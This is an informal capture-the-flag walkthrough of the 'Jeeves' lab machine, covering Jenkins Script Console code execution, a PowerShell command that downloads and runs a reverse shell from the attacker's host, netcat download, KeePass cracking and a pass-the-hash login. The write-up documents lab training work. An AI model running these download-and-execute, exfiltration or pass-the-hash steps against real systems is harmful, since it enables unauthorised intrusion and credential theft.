There are two ways to do prev-esc on this one.

Keypass

Nmap result:

Not shown: 996 filtered tcp ports (no-response)
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 10.0
|_http-title: Ask Jeeves
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp   open  msrpc        Microsoft Windows RPC
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open  http         Jetty 9.4.z-SNAPSHOT
|_http-title: Error 404 Not Found
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-02-09T07:47:47
|_  start_date: 2022-02-09T07:46:15
|_clock-skew: mean: 4h59m59s, deviation: 0s, median: 4h59m59s

80:

50000

Let's do gobuster on both ports.

I found /askjeeves on port 50000

visiting the directory, I got into the Jenkin's dashboard.

With the Jenkin's dashboard, we can run scripts through Script Console in "Manage Jenkins" that lets you run Groovy script

try: cmd ="whoami" println cmd.execute().text

it worked!

Let's grab a ps1 powershell from nishang.

make a new file for this particular box and copy & paste the example execution code at the bottom and modify IP

Run the python http server.

cmd =""" powershell IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.131/powershell.ps1')  """
println cmd.execute().tex

Now I got the user shell.

Privesc Method 1

use the powerup script in Powersploit/Privesc/

IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.131/PowerUp.ps1')

and to execute it,

run "Invoke-AllChecks"

Didn't find much here.

Let's keep enumerating.

We found a keydatabase file.

Let's get the file by creating a smb server on our kali machine!

• you need to have a directory with the name specified.

Now on the victim's machine, run

New-PSDrive -Name "yatta" -PSProvider "FileSystem" -root "\\10.10.14.131\unchiman"

# Run inside the reverse shell: 
powershell -c '(new-object Net.WebClient).DownloadFile("http://10.10.14.131/nc.exe", "C:\Windows\Temp\nc.exe")'
# OR
powershell -c 'Invoke-WebRequest "http://IP/nc.exe" -OutFile "C:\Windows\Temp\nc.exe"' 

powershell IEX(New-Object Net.WebClient).DownloadFile('http://10.10.14.131/nc.exe', "C:\Users\kohsuke\tmp\nc.exe")

The box is very unstable and lost connections over and over.

once we have the keeppass file transfered over, we can to keepass2john CEH.kdbx to get the hash and crack it with hashcat.

password is moonshine1

performed keepass2john for hash

hashcat it .

moonshine1

Download Keepass

sudo apt-get install keepassxc

got in.

in the backup file, I found NTLM hash.

Can we pass-the-hash it?

aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00

winexe -U jenkins/administrator //10.129.1.109 cmd.exe

this didn't workout

tried pth-winexe -U jenkins/administrator //10.129.1.109 cmd.exe and worked!

hm.txt has a root flag but its data stream is hidden.

dir /r will show hidden data streams(reference: https://www.lifewire.com/dir-command-4050018#:~:text=Dir%20Command%20Options%20%20%20%20Item%20,the%20thousa%20...%20%2013%20more%20rows%20)

more < hm.txt:root.txt:$DATA will unhidden it. or

powershell(Get-Content hm.txt -Stream root.txt) works as well.